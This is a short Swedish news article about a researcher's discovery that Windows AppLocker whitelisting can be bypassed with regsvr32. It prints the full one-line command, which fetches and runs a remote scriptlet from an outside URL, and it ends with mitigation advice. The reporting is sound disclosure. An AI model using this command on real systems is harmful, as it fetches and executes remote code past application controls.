Allt sedan Windows 7 har företag och skolor kunnat vila sig mot Applocker för att skydda sig mot virus och annan skum mjukvara. Funktionen gör att användare av företagsversionen av operativsystemet kan svart- ellet vitlista appar, en slags gästlista för vilka som får komma in i deras system.

Men nu har en säkerhetsforskare vid namn Casey Smith upptäckt att det finns en väg runt säkerhetsmuren och det med ett ganska enkelt kommando, skriver The Register. 

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
 

Säger man åt Regsvr32 att peka mot en extern fil, som ett skript, kan en hackare tvinga systemet att köra vilken app som helst. Således lite av en guldgruva för cyberbrottslingar. Det fina, ur en hackares perspektiv, är att man inte behöver tillgång till några administratörsuppgifter. Sårbarheten kan utnyttjas ändå och bäddas in i en krypterad http-session utan att lämna några spår på disken.

Läs också: Microsoft har två lösningar för containerteknik. Men vad är egentligen skillnaden?

Casey Smith skriver att det kan vara så att Device Guard i Windows 10, som kör Hyper-V, kan erbjuda fullt skydd och blockera virus och andra skumma program. Trots det kan det vara en bra idé att se över sina system om företaget förlitar sig på Applocker.

Microsoft har ännu inte tagit fram någon fix för felet. Däremot kan Regsvr32 blockeras via Windows brandvägg, vilket stoppar den från att få tillgång till filer online.